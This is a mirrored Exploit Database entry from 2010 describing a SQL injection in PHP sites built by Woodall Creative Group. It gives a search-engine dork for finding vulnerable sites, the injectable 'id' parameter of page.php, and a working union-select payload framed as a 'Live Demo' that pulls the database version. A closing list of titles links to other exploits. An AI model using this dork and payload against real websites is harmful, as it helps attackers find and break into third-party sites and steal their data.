Woodall Creative – SQL Injection

Exploit Database
12 阅读

作者： XroGuE

日期： 2010-05-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12576/

=========================================================
Woodall Creative SQL Injection Vulnerability
=========================================================
##########################################
# Name: Woodall Creative SQL Injection Vulnerability
# Date: 2010-05-11
# vendor: http://www.woodallcreative.com
# Author: Ashiyane Digital Security Team
# Thanks to: khodam :P, Satanic2000,Veron, ... And All Ashiyane Members ...
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork:intext: "Site developed & mantained by Woodall Creative Group"

[+] Vulnerability: www.site.com/[path]/page.php?id=[SQLi]

[+] Live Demo: http://[site]/page.php?id=-999+union+select+1,2,3,4,5,6,7,@@version

last Exploits
Woodall Creative – SQL Injection的更多信息

JQuery-Real-Person plugin – Bypass Captcha：
FOOT Gestion – ‘id’ SQL Injection：
Cetera eCommerce – Multiple Cross-Site Scripting / HTML Injection Vulnerabilities：
Joomla! Component com_bbs – Multiple SQL Injections：
OpenNetAdmin 13.03.01 – Remote Code Execution：
WordPress Plugin 3DPrint Lite 1.9.1.4 – Arbitrary File Upload：
Oriol Espinal CMS 1.0 – ‘id’ SQL Injection：
phpList 2.10.18 – ‘unconfirmed’ Cross-Site Scripting：